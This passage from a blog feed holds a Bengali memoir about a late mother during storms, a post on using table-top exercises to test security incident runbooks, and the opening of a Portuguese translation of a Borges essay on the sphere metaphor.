<p>আসলে ‘ইদানীং মনে পড়ছে’ বলাটা ভুল হবে। আম্মা চলে যাওয়ার পর থেকে জীবনের এমন কোনো মুহূর্ত নেই, যেখানে তার ছায়া আমি খুঁজে না। এখন প্রতিটা ছোটোখাটো কাজেই আম্মা অবধারিতভাবে চলে আসেন। কোনো একটা কাজ করতে গিয়ে থমকে দাঁড়িয়ে ভাবি, ‘আচ্ছা, আম্মা থাকলে তো কাজটা এভাবে করতেন না, তিনি হয়তো অন্য কোনো সহজ উপায়ে করে দিতেন!’ কিংবা কোনো জিনিস অগোছালো দেখলে কানের কাছে যেন মায়ের সেই চিরচেনা কণ্ঠস্বর ভেসে ওঠে, ‘এটা এখানে রাখছিস কেন? ঐখানে রাখ।’ অথবা কোনো কাজে আটকে গেলে মনে হয়, আম্মা থাকলে ঠিকই এই সমস্যার কোনো সমাধান বলে দিতেন। এই রকম হাজারো হাবিজাবি, টুকরো টুকরো ভাবনা এখন আমার একাকিত্বের সঙ্গী।</p>

<p>তবে আজকের এই ঝড়-বৃষ্টির রাতটা যেন আম্মার স্মৃতিকে বড্ড বেশি জীবন্ত করে তুলেছে। আম্মাকে আমাদের চেনা-পরিচিত সবাই খুব সাহসী এক নারী হিসেবেই জানত। যে কোনো বড়ো বিপদ বা কঠিন পরিস্থিতি তিনি এত ঠান্ডা মাথায় সামাল দিতেন যে, অবাক হতে হতো। দেখে মনে হতো, তার কোনো উদ্বেগ নেই, কোনো তাড়াহুড়ো নেই। যেন এক অদ্ভুত জাদুবলে সবটা ঠিক হয়ে যাচ্ছে, কিংবা অদৃশ্য কেউ একজন এসে তার হয়ে সব গুছিয়ে দিয়ে যাচ্ছে।</p>

<p>কিন্তু আমার কেন যেন মনে হতো, এই পাহাড়সম সাহসী মানুষটারও একটা দুর্বল জায়গা ছিল। ঝড়-বৃষ্টির সময় আম্মাকে আমার বড্ড ভীতু মনে হতো। যদিও তিনি মুখে কখনো ভয়ের কথা স্বীকার করতেন না, চোখে-মুখেও ভয়ের কোনো রেখা ফুটতে দিতেন না, তাও একজন সন্তানের চোখ তো! মায়ের ভেতরের চাপা অস্থিরতাটুকু আমি ঠিকই টের পেতাম।</p>

<p>সেই দিনগুলোর কথা মনে হলে আজও ঠোঁটের কোণে মৃদু হাসি ফোটে, আবার পরক্ষণেই চোখটা ভিজে আসে। বজ্রপাত শুরু হওয়া মাত্রই নিয়ম করে এলাকার বিদ্যুৎ চলে যেত। চারদিক ঘুটঘুটে অন্ধকার হওয়ার আগেই আম্মা তড়িঘড়ি করে এসে বসতেন আমাদের ড্রয়িংরুমে, যেটাকে আমরা বলতাম ‘সোফার রুম’। সোফার রুমে বসেই উচ্চকণ্ঠে বাড়ির সবাইকে ডাকতেন, ‘কই রে তোরা, সব এখানে আয়!’</p>

<p>আম্মার ডাক শোনামাত্রই আমরা যে যেখানে থাকতাম সবাই মিলে টর্চ, চার্জার লাইট কিংবা মোবাইলের ফ্ল্যাশ জ্বালিয়ে সেই সোফার রুমে গিয়ে জড়ো হতাম। মুহূর্তের মধ্যেই সেই অন্ধকার ঘরটা আলো আর মানুষের কলকাকলিতে মুখর হয়ে উঠতো। এরপর শুরু হতো এক তুমুল আড্ডা। বাচ্চারা আলো-আধারেই নিজেদের মতো খেলা শুরু করে দিতো, চিৎকার করত, ঝগড়া করতো আবার খুনসুটিতে মেতে উঠত।</p>

<p>আম্মা কখনো কখনো সোফায় কিংবা মেঝেতে বসতেন। বাকিরা যে যার সুবিধা মতো জায়গা করে বসতো। তারপর আম্মা ধীরে ধীরে বলতে শুরু করতেন। কত গল্প বলতেন, কত মানুষকে নিয়ে বলতেন, কত-কত সময়কে নিয়ে বলতেন। কী ছিলো না তার সেই টুকরো টুকরো কথায়! আমি সাধারণত সেসব আড্ডায় খুব একটা কথা বলতাম না, নিজের মতো এক কোণে বসে আম্মার গল্প শুনতাম, বাচ্চাদের আনন্দ দেখতাম, মোবাইল স্ক্রিনে দৃষ্টি নিবন্ধ করে রাখতাম, আর মাঝে মাঝে চোখ তুলে আম্মাকে একটু দেখতাম। অন্ধকারের মাঝেও আম্মার হাসিমুখটা দেখতে বড্ড ভালো লাগত।</p>

<p>আম্মা শুধু আমাদের নিয়েই ব্যস্ত থাকতেন এমন না, বরং ঝড়ের মাঝেই মোবাইলে কাছের-দূরের আত্মীয়, পরিচিত সব মানুষকে ফোন করে খোঁজ-খবর নিতেন। কে কেমন আছে, কার বাড়ির চাল উড়ে গেল কি না, কোথাও কোনো ক্ষয়ক্ষতি হলো কি না -এমন সব খোঁজ-খবর নেয়া চলতো। পুরো ঘরটা তখন এক অদ্ভুত ওমে, ভালোবাসার চাদরে ঢাকা পড়ে থাকত। বাইরের ঝড়-বৃষ্টির হুংকার তখন আর আমাদের ছুঁতে পারত না।</p>

<p>আজ আম্মা নেই, দেখতে দেখতে একটা বছর পার হয়ে গেল। প্রকৃতিতে আজও ঝড় আসে, বৃষ্টি নামে, আকাশ ভেঙে বজ্রপাত হয়। বিদ্যুৎ চলে গেলে চারদিক আগের মতোই অন্ধকার হয়ে যায়। কিন্তু আমাদের আর সেই সোফার রুমে একত্রে বসা হয় না। সত্যি বলতে, এখন আর ওভাবে বসতে ইচ্ছেও করে না। যে মানুষটাকে কেন্দ্র করে আমাদের সেই অন্ধকারের উৎসব জমে উঠত, সেই মানুষটাই যখন নেই, তখন সোফার রুমের ওই শূন্যতাটুকু বড্ড বেশি কামড়ে ধরে। সবার হৃদয়ে আলো জ্বালানোর মানুষটাই আজ অন্ধকার ঘরে একাকী নিদ্রা যাপন করছে।</p>

<p>মাঝে মাঝে এই রকম দমকা হাওয়া আর বৃষ্টির রাতে বুকের ভেতরটা বড্ড বেশি হাহাকার করে ওঠে। তীব্র ইচ্ছে জাগে, সব ফেলে এই ঝড়-বৃষ্টির মাঝেই ছুটে যাই আম্মার কবরের পাশে। সেখানে গিয়ে চুপচাপ বসে থাকি, যেভাবে একসময় সোফার রুমে এক কোণে বসতাম। আম্মার মাটির বিছানার পাশে বসে বলি, ‘আম্মা, ডরাইয়েন না। এই বৃষ্টি একটু পরেই থাইমা যাইবো।’</p>

<p>কিন্তু সময় আর নিষ্ঠুর বাস্তবতার বেড়াজালে আটকে সেই ইচ্ছেটা আর পূরণ হয় না। জানালা দিয়ে আসা ঠান্ডা বাতাসটা গায়ে লাগে, আর আমি একা ঘরের বিছানায় শুয়ে স্মৃতির কম্বল মুড়ি দিয়ে আম্মাকে খুঁজি।</p>

<p>আম্মা ভালো থাকুক তার এই দীর্ঘ নিদ্রায়। পৃথিবীর কোনো ঝড়, কোনো মেঘের গর্জন কিংবা কোনো বজ্রপাত আর কখনোই যেন তাকে বিচলিত না করতে পারে। অনন্তকাল পরম শান্তিতে তিনি ঘুমিয়ে থাকুক নিশ্চিন্তে।</p>

<p>⠀⠀</p>

<p>⠀⠀</p>

<p>⠀⠀</p>

<p>⠀⠀</p>

<p>⠀⠀</p>
]]></content:encoded>
      <author>লোকমানুষ এর ব্লগ</author>
      <guid>https://infosec.press/read/a/htw760upw6</guid>
      <pubDate>Mon, 25 May 2026 18:00:00 +0000</pubDate>
    </item>
    <item>
      <title>Table-Top Security Exercises</title>
      <link>https://infosec.press/security-through-the-looking-glass/table-top-security-exercises</link>
      <description>&lt;![CDATA[A train has derailed near a populated area. Multiple people are reporting eye and throat irritation. One person, an elderly man working near the site, has been hospitalized with respiratory complications. What do you do?&#xA;&#xA;Table-top exercises (TTX) are common in public disaster response. They help management teams check their plans. They verify that inter-agency communication and coordination works as expected. They teach team leaders to ask the right questions, and to respond dynamically under pressure. Like practicing forms in martial arts, they train a sort of muscle memory that takes over when it matters.&#xA;&#xA;Disasters will happen. That&#39;s a simple fact of reality. While systems should be built to prevent them, it is also critical to prepare to respond to them. By training, organizations decrease response time. Decreasing response time saves lives.&#xA;&#xA;Perhaps some of this sounds familiar. I remember log4shell. I was called into a room with other security leaders. People brainstormed, identified gaps, took tasks, and got to work. Commercial scanners lagged behind, so we designed and built our own. We ran it, manually checked things flagged as &#34;false positives,&#34; and drove every instance into the ground. There were a lot of late nights, a lot of grumpy engineers paged in to patch their systems. It was hard work, stressful at the beginning, but, in the end, it was good. We quickly developed a flow and coordinated closely as an ad-hoc team. We found the bugs, fixed them, and came out the other side with better tools and better procedures.&#xA;&#xA;Large scale security events like log4shell, text4shell, spring4shell, and others are unlikely to become less common. LLMs allow code to be generated more quickly and with less knowledge. Meanwhile, these same LLMs either miss vulnerabilities or are prohibitively expensive to run on incoming code. Core open source infrastructure has been inundated with pull requests, while closed source software is infeasible to use for many projects with no way of knowing if quality is better.&#xA;&#xA;LLMs themselves have been integrated into all sorts of projects. Meanwhile, it remains ultimately impossible to secure LLMs. Our attack surface continues to multiply, while tools for managing this complexity are still evolving. The ever-relevant Gramsci quote haunts us. Indeed, &#34;now is the time of monsters.&#34;&#xA;&#xA;If you use software in 2026, especially if that software is Internet facing, you need to be ready to respond to a large scale event. But CVSS 10 0-day events are uncommon. How do you prepare for something that requires such a high level of coordination and precision, that demands a rapid response, and that doesn&#39;t happen very often? More importantly, how do you prepare to respond outside of the crucible of the actual event? Take a page from disaster response: practice.&#xA;&#xA;Our response to log4shell was solid and quick. The room was full of the best engineers and managers, people with a lot of institutional knowledge and a lot of talent. Leaders followed everything closely and always asked the right questions. But we were still inventing things, figuring stuff out, sometimes stepping on each other&#39;s toes. After log4shell, we wrote a runbook for such large scale events. Then we tested it, several times, with table-top exercises, until we were confident it could be executed successfully.&#xA;&#xA;Every disaster preparedness exercise starts with a runbook. You can&#39;t really test a plan unless you have a plan, can you? Do you have a runbook? Let&#39;s talk briefly about what that looks like.&#xA;&#xA;A large scale security event runbook needs to answer several questions:&#xA;&#xA;How do you know there&#39;s an event?&#xA;    Do you have a vendor who will alert you? Do you subscribe to a newsletter? Is there an intelligence team? What are you doing to make sure you&#39;re on top of security news?&#xA;How do you know the event is an emergency for you?&#xA;    Do you have a feed of already-vetted intelligence? Does your security team verify news? How will they do that?&#xA;Who do you call in?&#xA;    This should be a list of roles, but those roles should be associated with pagers or phone numbers. Phone numbers should have back-up phone numbers. Do you have the right people? You will need to have people in the room who can answer more questions, or can find the right people to answer those questions.&#xA;How do you stop making the problem worse?&#xA;    You are going to keep making code, or at least using it. How do you make sure you aren&#39;t deploying vulnerable stuff right now. If you can&#39;t stop pushing out more vulnerable code, then you&#39;re digging in sand: any progress you do manage to make will only be eaten away as you push more stuff out.&#xA;How do you find out what is vulnerable now?&#xA;    Do you have a commercial scanner? Does it have updated signatures? Can you wait for them? Can you shut potentially vulnerable services down while you wait, or are they critical? Do you need to write your own scanner? Do you have the skills in-house to do that? Do you have a vendor you can call?&#xA;How do you find out what has been compromised?&#xA;    If you patch fast enough, you may be able to avoid being hit before adversaries can scramble their resources. But don&#39;t count on that. Who do you call to figure out what the signatures of a compromise might look like? Do you have an incident response team? Do you have a vendor you work with?&#xA;What do you do when you find a vulnerable system? What do you do when you find a compromised system?&#xA;    Some of these questions can fall off to other runbooks. Your vulnerability management team should already have a generic runbook for dealing with vulnerable systems. Your incident response team should have incident response runbooks. Do they work? You can test them while you&#39;re testing this one.&#xA;How do you inform customers?&#xA;    Do you have a media team? Do you have an existing template for large scale events? What is important to tell customers? What regulatory requirements do you have for disclosure based on your business?&#xA;How do you know when you&#39;re done?&#xA;    Fires will come and go. You can&#39;t stay in emergency mode all the time, or you&#39;ll burn yourself and your people out. But if you go home too early you might miss something critical. What is the indicator that it&#39;s time to transition to everything back to normal operation? When can normal runbooks take over from large scale event runbooks? Does someone decide? Is there a specific threshold?&#xA;&#xA;The runbook doesn&#39;t need to be perfect. It won&#39;t be. It will never be. It should not be expected to be. That&#39;s the whole point of this exercise.&#xA;&#xA;After reading all of this you may not be ready to go to the next step. That&#39;s fine. You&#39;ve already learned something about your capacity to respond, and that&#39;s what&#39;s important. Record those lessons, turn them into action items, drive each one to closure. Even if you are ready, this will become a pattern. Each time you test, you learn something. You come out with information that you need to turn into action items. You need to make sure those items get closed. Each cycle will repeat this same pattern.&#xA;&#xA;Do you have a good start? Great. Let&#39;s test it.&#xA;&#xA;You&#39;ll need to choose a facilitator. In the table-top RPG world, the facilitator who leads the scenario is called a &#34;Game Master&#34; or &#34;GM.&#34; Your GM is going to come up with a scenario, keep track of progress against the scenario, and generally run the exercise. There&#39;s a mix of procedure and creativity involved in both gaming and these types of exercises, so we&#39;re going to stick with the terminology of &#34;GM&#34; for our facilitator. We&#39;re also going to use the terms &#34;player&#34; and &#34;game&#34; to describe team members and the exercise.&#xA;&#xA;The GM will be tasked with coming up with a scenario. This should draw from past experiences, if you have them, or external accounts of incident response. If you have an organizational threat model, you will want to include this in crafting the scenario. What kind of event would most impact your business? What kinds of disruptions would be the most harmful? What subsystems are the most critical?&#xA;&#xA;It may be tempting to use LLMs to help generate scenarios, and this may well work. But the research that goes into generating scenarios also helps build knowledge. That knowledge can be useful in developing a more robust runbook, and in responding more dynamically to disruption.&#xA;&#xA;Fortunately, there are also other resources. CISA has a set of tabletop exercise packages focused on specific industries. Some vendors may create tabletop exercises on request, or may have already existing packages they can support you with. The Backdoors and Breaches card deck can also provide help provide inspiration. &#xA;&#xA;Once you have a scenario, schedule a game day. You can make it as realistic as you want. Getting important people in a room to talk through everything will give you a high level check. But the more realistic the exercise, the more that can go wrong, and the more opportunities you have to learn from that. The scenario will include information about how people find out. Did someone read the vulnerability on HackerNews? How long does it take to from contacting the security help desk to having security leadership in a room?&#xA;&#xA;Once the GM has gathered together the appropriate security roles, as designated by the runbook, the GM will then provide appropriate information. Security will ask questions to get as much information as possible, and execute on the runbook from there.&#xA;&#xA;The game is turn based. Each round starts with the GM giving some information about the current situation and relevant situational changes. Depending on the flow of the scenario, the GM may not reveal all relevant information unless specific actions are carried out. For example, a GM may choose to designate a system as &#34;compromised&#34; during a turn but would only reveal that information after incident response starts looking for signatures.&#xA;&#xA;The GM may play as all external actors. This includes adversaries, security vendors, and external researchers. Alternatively, a &#34;Red Team&#34; may be designated to play as the adversaries against the defending &#34;Blue Team.&#34; When played this way, the exercise begins to look more like a military tabletop exercise. Military models can also prove useful here. &#xA;&#xA;The OODA Loop is a decision-making model developed by Air Force Colonel John Boyd to help fighter pilots make clear decisions under extreme stress. We can also use this model to help train quick and clear decision-making. Since this article focuses on TTX for security, we&#39;re only going to briefly touch on the subject here.&#xA;&#xA;During each phase, players can talk through each step of the OODA Loop:&#xA;&#xA;Observe&#xA;    What data do we have? How are we getting our data? Is our data already refined into intelligence, or do we still need to refine it? Keep track of what information is missing so you can collect that later.&#xA;Orient&#xA;    What does this data tell us? What do we know, or think we know? How does this new data challenge or confirm that? What does this data mean for us, in the context of this situation? Is anything we&#39;re observing now the result of a previous action we&#39;ve taken, or is it the result of external actors? What does the runbook say? Does any of the information we have trigger a runbook action, or do we need to figure things out? Is anything actionable, or do we need to learn more before we can choose other actions?&#xA;Decide&#xA;    Choose an action from the set of actions. If the data doesn&#39;t simply trigger the next runbook step, does your next action help you understand the situation more? What belief does your next action imply? How will you know if that action was correct or incorrect? Can you form a hypothesis? What observations would challenge your hypothesis? What observations would confirm it? Are those mutually exclusive, or are there additional observations or actions you must make to clarify things?&#xA;Act&#xA;    Finish your turn by choosing your action or actions (individually or collectively). Perhaps take a moment to write down notes, like what your observations, your hypothesis, and if you think your previous hypothesis was confirmed or refuted. You can review these all later to refine your thinking.&#xA;&#xA;End your session after you&#39;ve either reached the terminal point of your runbook or you&#39;ve reached a problem with your runbook so bad you had to stop. (Don&#39;t worry, this doesn&#39;t mean you&#39;ve done a bad job. It means you&#39;ve learned something important before it was a problem.) &#xA;&#xA;When you&#39;re done, the GM can reveal any hidden information not yet revealed. Plan a retrospective to identify areas of improvement. Turn these notes into action items, and plan to re-run after you&#39;ve completed those items.&#xA;&#xA;Run this game multiple times until you&#39;re confident in the results. You may still learn things each time. You may still come out with action items. But there comes a point where the cost of practice outweighs the value of the lessons you will learn. Where this price point lies depends on your business and the risk tolerance of your industry.&#xA;&#xA;You can get a bit more value out of repeated exercises by making them more realistic (as described earlier), or by adding in a &#34;chaos monkey&#34; element. The &#34;chaos monkey&#34; may remove a person (simulating, for example, a personal emergency), or report that tooling has been broken. In this variant, an incident responder may find expected logs missing, or a critical employee may be unavailable. In the same way that the tool helps you build more a resilient architecture, so does this element help your team become more resilient in the face of challenges.&#xA;&#xA;Large scale runbooks can be tested quarterly, yearly, or every two years, depending on staff turnover and technology changes. Runbooks and skills both begin to rot the moment they are not used.&#xA;&#xA;But why should we stop at large scale events?&#xA;&#xA;Every engineering team should know what to do if their software is compromised. They should know where to look for logs to help incident responders. They should know which regulatory agencies they need to contact, and the time limits for legal compliance. These timelines may be surprising. Companies running in India, for example, have 72 hours to report a breach before risking penalties.&#xA;&#xA;Scaled down versions of these table-top exercises can be run to verify team&#xA;runbooks. And the GM&#39;s role scales well. One GM can facilitate multiple sessions&#xA;at the same time, with different learning from the exercise together, learning from each other&#39;s good ideas and failures. Shared retrospectives can provide opportunities to foster innovation by cross-pollinating between teams. &#xA;&#xA;Rare events can be chaotic, and time can be lost in that chaos. Lost time can be lost data, and lost data can be both lost revenue and fines. By training for rare and unexpected events, it becomes possible to minimize their impact. While a data breach and lose customer trust, a competent response to an unexpected event can also build trust.&#xA;&#xA;How prepared are you for the unexpected? Are you ready to find out?]]&gt;</description>
      <content:encoded><![CDATA[<p>A train has derailed near a populated area. Multiple people are reporting eye and throat irritation. One person, an elderly man working near the site, has been hospitalized with respiratory complications. What do you do?</p>

<p>Table-top exercises (TTX) are common in public disaster response. They help management teams check their plans. They verify that inter-agency communication and coordination works as expected. They teach team leaders to ask the right questions, and to respond dynamically under pressure. Like practicing forms in martial arts, they train a sort of muscle memory that takes over when it matters.</p>

<p>Disasters will happen. That&#39;s a simple fact of reality. While systems should be built to prevent them, it is also critical to prepare to respond to them. By training, organizations decrease response time. Decreasing response time saves lives.</p>

<p>Perhaps some of this sounds familiar. I remember log4shell. I was called into a room with other security leaders. People brainstormed, identified gaps, took tasks, and got to work. Commercial scanners lagged behind, so we designed and built our own. We ran it, manually checked things flagged as “false positives,” and drove every instance into the ground. There were a lot of late nights, a lot of grumpy engineers paged in to patch their systems. It was hard work, stressful at the beginning, but, in the end, it was good. We quickly developed a flow and coordinated closely as an ad-hoc team. We found the bugs, fixed them, and came out the other side with better tools and better procedures.</p>

<p>Large scale security events like log4shell, text4shell, spring4shell, and others are unlikely to become less common. LLMs allow code to be generated more quickly and with less knowledge. Meanwhile, these same LLMs either miss vulnerabilities or are prohibitively expensive to run on incoming code. Core open source infrastructure has been inundated with pull requests, while closed source software is infeasible to use for many projects with no way of knowing if quality is better.</p>

<p>LLMs themselves have been integrated into all sorts of projects. Meanwhile, it remains ultimately impossible to secure LLMs. Our attack surface continues to multiply, while tools for managing this complexity are still evolving. The ever-relevant Gramsci quote haunts us. Indeed, “now is the time of monsters.”</p>

<p>If you use software in 2026, especially if that software is Internet facing, you need to be ready to respond to a large scale event. But CVSS 10 0-day events are uncommon. How do you prepare for something that requires such a high level of coordination and precision, that demands a rapid response, and that doesn&#39;t happen very often? More importantly, how do you prepare to respond outside of the crucible of the actual event? Take a page from disaster response: practice.</p>

<p>Our response to log4shell was solid and quick. The room was full of the best engineers and managers, people with a lot of institutional knowledge and a lot of talent. Leaders followed everything closely and always asked the right questions. But we were still inventing things, figuring stuff out, sometimes stepping on each other&#39;s toes. After log4shell, we wrote a runbook for such large scale events. Then we tested it, several times, with table-top exercises, until we were confident it could be executed successfully.</p>

<p>Every disaster preparedness exercise starts with a runbook. You can&#39;t really test a plan unless you have a plan, can you? Do you have a runbook? Let&#39;s talk briefly about what that looks like.</p>

<p>A large scale security event runbook needs to answer several questions:</p>
<ol><li>How do you know there&#39;s an event?
Do you have a vendor who will alert you? Do you subscribe to a newsletter? Is there an intelligence team? What are you doing to make sure you&#39;re on top of security news?</li>
<li>How do you know the event is an emergency for you?
Do you have a feed of already-vetted intelligence? Does your security team verify news? How will they do that?</li>
<li>Who do you call in?
This should be a list of roles, but those roles should be associated with pagers or phone numbers. Phone numbers should have back-up phone numbers. Do you have the right people? You will need to have people in the room who can answer more questions, or can find the right people to answer those questions.</li>
<li>How do you stop making the problem worse?
You are going to keep making code, or at least using it. How do you make sure you aren&#39;t deploying vulnerable stuff right now. If you can&#39;t stop pushing out more vulnerable code, then you&#39;re digging in sand: any progress you do manage to make will only be eaten away as you push more stuff out.</li>
<li>How do you find out what is vulnerable now?
Do you have a commercial scanner? Does it have updated signatures? Can you wait for them? Can you shut potentially vulnerable services down while you wait, or are they critical? Do you need to write your own scanner? Do you have the skills in-house to do that? Do you have a vendor you can call?</li>
<li>How do you find out what has been compromised?
If you patch fast enough, you may be able to avoid being hit before adversaries can scramble their resources. But don&#39;t count on that. Who do you call to figure out what the signatures of a compromise might look like? Do you have an incident response team? Do you have a vendor you work with?</li>
<li>What do you do when you find a vulnerable system? What do you do when you find a compromised system?
Some of these questions can fall off to other runbooks. Your vulnerability management team should already have a generic runbook for dealing with vulnerable systems. Your incident response team should have incident response runbooks. Do they work? You can test them while you&#39;re testing this one.</li>
<li>How do you inform customers?
Do you have a media team? Do you have an existing template for large scale events? What is important to tell customers? What regulatory requirements do you have for disclosure based on your business?</li>
<li>How do you know when you&#39;re done?
Fires will come and go. You can&#39;t stay in emergency mode all the time, or you&#39;ll burn yourself and your people out. But if you go home too early you might miss something critical. What is the indicator that it&#39;s time to transition to everything back to normal operation? When can normal runbooks take over from large scale event runbooks? Does someone decide? Is there a specific threshold?</li></ol>

<p>The runbook doesn&#39;t need to be perfect. It won&#39;t be. It will never be. It should not be expected to be. That&#39;s the whole point of this exercise.</p>

<p>After reading all of this you may not be ready to go to the next step. That&#39;s fine. You&#39;ve already learned something about your capacity to respond, and that&#39;s what&#39;s important. Record those lessons, turn them into action items, drive each one to closure. Even if you are ready, this will become a pattern. Each time you test, you learn something. You come out with information that you need to turn into action items. You need to make sure those items get closed. Each cycle will repeat this same pattern.</p>

<p>Do you have a good start? Great. Let&#39;s test it.</p>

<p>You&#39;ll need to choose a facilitator. In the table-top RPG world, the facilitator who leads the scenario is called a “Game Master” or “GM.” Your GM is going to come up with a scenario, keep track of progress against the scenario, and generally run the exercise. There&#39;s a mix of procedure and creativity involved in both gaming and these types of exercises, so we&#39;re going to stick with the terminology of “GM” for our facilitator. We&#39;re also going to use the terms “player” and “game” to describe team members and the exercise.</p>

<p>The GM will be tasked with coming up with a scenario. This should draw from past experiences, if you have them, or external accounts of incident response. If you have an organizational threat model, you will want to include this in crafting the scenario. What kind of event would most impact your business? What kinds of disruptions would be the most harmful? What subsystems are the most critical?</p>

<p>It may be tempting to use LLMs to help generate scenarios, and this may well work. But the research that goes into generating scenarios also helps build knowledge. That knowledge can be useful in developing a more robust runbook, and in responding more dynamically to disruption.</p>

<p>Fortunately, there are also other resources. <a href="https://www.cisa.gov/resources-tools/services/cisa-tabletop-exercise-packages" rel="nofollow">CISA</a> has a set of tabletop exercise packages focused on specific industries. Some vendors may create tabletop exercises on request, or may have already existing packages they can support you with. The <a href="https://play.backdoorsandbreaches.com/" rel="nofollow">Backdoors and Breaches</a> card deck can also provide help provide inspiration.</p>

<p>Once you have a scenario, schedule a game day. You can make it as realistic as you want. Getting important people in a room to talk through everything will give you a high level check. But the more realistic the exercise, the more that can go wrong, and the more opportunities you have to learn from that. The scenario will include information about how people find out. Did someone read the vulnerability on HackerNews? How long does it take to from contacting the security help desk to having security leadership in a room?</p>

<p>Once the GM has gathered together the appropriate security roles, as designated by the runbook, the GM will then provide appropriate information. Security will ask questions to get as much information as possible, and execute on the runbook from there.</p>

<p>The game is turn based. Each round starts with the GM giving some information about the current situation and relevant situational changes. Depending on the flow of the scenario, the GM may not reveal all relevant information unless specific actions are carried out. For example, a GM may choose to designate a system as “compromised” during a turn but would only reveal that information after incident response starts looking for signatures.</p>

<p>The GM may play as all external actors. This includes adversaries, security vendors, and external researchers. Alternatively, a “Red Team” may be designated to play as the adversaries against the defending “Blue Team.” When played this way, the exercise begins to look more like a military tabletop exercise. Military models can also prove useful here.</p>

<p>The OODA Loop is a decision-making model developed by Air Force Colonel John Boyd to help fighter pilots make clear decisions under extreme stress. We can also use this model to help train quick and clear decision-making. Since this article focuses on TTX for security, we&#39;re only going to briefly touch on the subject here.</p>

<p>During each phase, players can talk through each step of the OODA Loop:</p>
<ol><li>Observe
What data do we have? How are we getting our data? Is our data already refined into intelligence, or do we still need to refine it? Keep track of what information is missing so you can collect that later.</li>
<li>Orient
What does this data tell us? What do we know, or think we know? How does this new data challenge or confirm that? What does this data mean for us, in the context of this situation? Is anything we&#39;re observing now the result of a previous action we&#39;ve taken, or is it the result of external actors? What does the runbook say? Does any of the information we have trigger a runbook action, or do we need to figure things out? Is anything actionable, or do we need to learn more before we can choose other actions?</li>
<li>Decide
Choose an action from the set of actions. If the data doesn&#39;t simply trigger the next runbook step, does your next action help you understand the situation more? What belief does your next action imply? How will you know if that action was correct or incorrect? Can you form a hypothesis? What observations would challenge your hypothesis? What observations would confirm it? Are those mutually exclusive, or are there additional observations or actions you must make to clarify things?</li>
<li>Act
Finish your turn by choosing your action or actions (individually or collectively). Perhaps take a moment to write down notes, like what your observations, your hypothesis, and if you think your previous hypothesis was confirmed or refuted. You can review these all later to refine your thinking.</li></ol>

<p>End your session after you&#39;ve either reached the terminal point of your runbook or you&#39;ve reached a problem with your runbook so bad you had to stop. (Don&#39;t worry, this doesn&#39;t mean you&#39;ve done a bad job. It means you&#39;ve learned something important before it was a problem.)</p>

<p>When you&#39;re done, the GM can reveal any hidden information not yet revealed. Plan a retrospective to identify areas of improvement. Turn these notes into action items, and plan to re-run after you&#39;ve completed those items.</p>

<p>Run this game multiple times until you&#39;re confident in the results. You may still learn things each time. You may still come out with action items. But there comes a point where the cost of practice outweighs the value of the lessons you will learn. Where this price point lies depends on your business and the risk tolerance of your industry.</p>

<p>You can get a bit more value out of repeated exercises by making them more realistic (as described earlier), or by adding in a “chaos monkey” element. The “chaos monkey” may remove a person (simulating, for example, a personal emergency), or report that tooling has been broken. In this variant, an incident responder may find expected logs missing, or a critical employee may be unavailable. In the same way that <a href="https://netflix.github.io/chaosmonkey/" rel="nofollow">the tool</a> helps you build more a resilient architecture, so does this element help your team become more resilient in the face of challenges.</p>

<p>Large scale runbooks can be tested quarterly, yearly, or every two years, depending on staff turnover and technology changes. Runbooks and skills both begin to rot the moment they are not used.</p>

<p>But why should we stop at large scale events?</p>

<p>Every engineering team should know what to do if their software is compromised. They should know where to look for logs to help incident responders. They should know which regulatory agencies they need to contact, and the time limits for legal compliance. These timelines may be surprising. Companies running in India, for example, have 72 hours to report a breach before risking penalties.</p>

<p>Scaled down versions of these table-top exercises can be run to verify team
runbooks. And the GM&#39;s role scales well. One GM can facilitate multiple sessions
at the same time, with different learning from the exercise together, learning from each other&#39;s good ideas and failures. Shared retrospectives can provide opportunities to foster innovation by cross-pollinating between teams.</p>

<p>Rare events can be chaotic, and time can be lost in that chaos. Lost time can be lost data, and lost data can be both lost revenue and fines. By training for rare and unexpected events, it becomes possible to minimize their impact. While a data breach and lose customer trust, a competent response to an unexpected event can also build trust.</p>

<p>How prepared are you for the unexpected? Are you ready to find out?</p>
]]></content:encoded>
      <author>Security Through the Looking Glass</author>
      <guid>https://infosec.press/read/a/tpv60d35ff</guid>
      <pubDate>Tue, 19 May 2026 20:26:28 +0000</pubDate>
    </item>
    <item>
      <title>A esfera de Pascal</title>
      <link>https://infosec.press/nomos/a-esfera-de-pascal</link>
      <description>&lt;![CDATA[Por Jorge Luis Borges - Buenos Aires, 1951.&#xA;&#xA;A esfera de Pascal&#xA;!--more--&#xA;Talvez a história universal seja a história de algumas metáforas. Esboçar um capítulo dessa história é o fito desta nota.&#xA;&#xA;Seis séculos antes da era cristã, o rapsodo Xenófanes de Colofônio, farto dos versos homéricos que recitava de cidade em cidade, condenou os poetas que atribuíram traços antropomórficos aos deuses e propôs aos gregos um único Deus, que era uma esfera eterna. No Timeu, de Platão, lê-se que a esfera é a figura mais perfeita e mais uniforme, porque todos os pontos da superfície equidistam do centro; Olof Gigon (Ursprang der Griechischen Philosophie, 183) entende que Xenófanes falou analogicamente; o Deus era esferoidal por ser essa forma a melhor, ou menos má, para representar a divindade.&#xA;&#xA;Parmênides, quarenta anos depois, repetiu a imagem (&#34;o Ser é semelhante à massa de uma esfera bem arredondada, cuja força é constante do centro em qualquer direção&#34;); Calogero e Mondolfo entendem que ele intuiu uma esfera infinita, ou infinitamente crescente, e que as palavras transcritas acima têm um sentido dinâmico (Albertelli: Gli Eleati, 148). Parmênides lecionou na Itália; poucos anos antes de sua morte, o siciliano Empédocles de Agrigento urdiu uma laboriosa cosmogonia; há uma etapa em que as partículas da terra, da água, do ar e do fogo integram uma esfera sem fim, &#34;o Sphairos redondo, que exulta em sua solidão circular&#34;.&#xA;&#xA;A história universal seguiu seu curso, os deuses demasiado humanos que Xenófanes atacara foram rebaixados a ficções poéticas ou a demônios, mas afirmou-se que um deles, Hermes Trismegisto, ditara um número variável de livros (42, segundo Clemente de Alexandria; 20.000, segundo Jâmblico; 36.525, segundo os sacerdotes de Thot, que também era Hermes), em cujas páginas estavam escritas todas as coisas. Fragmentos dessa biblioteca ilusória, compilados ou forjados desde o século I1, formam aquilo que recebe o nome de Corpus Hermeticum; em um desses fragmentos, ou no Asclépio, também atribuído a Trismegisto, o teólogo francês Alain de Lille — Alanus de Insulis — descobriu em fins do século XII a seguinte fórmula, que as idades vindouras não esqueceriam: &#34;Deus é uma esfera inteligível, cujo centro está em toda a parte e a circunferência em nenhuma&#34;. Os pré-socráticos falaram de uma esfera sem fim; Albertelli (como, antes, Aristóteles) 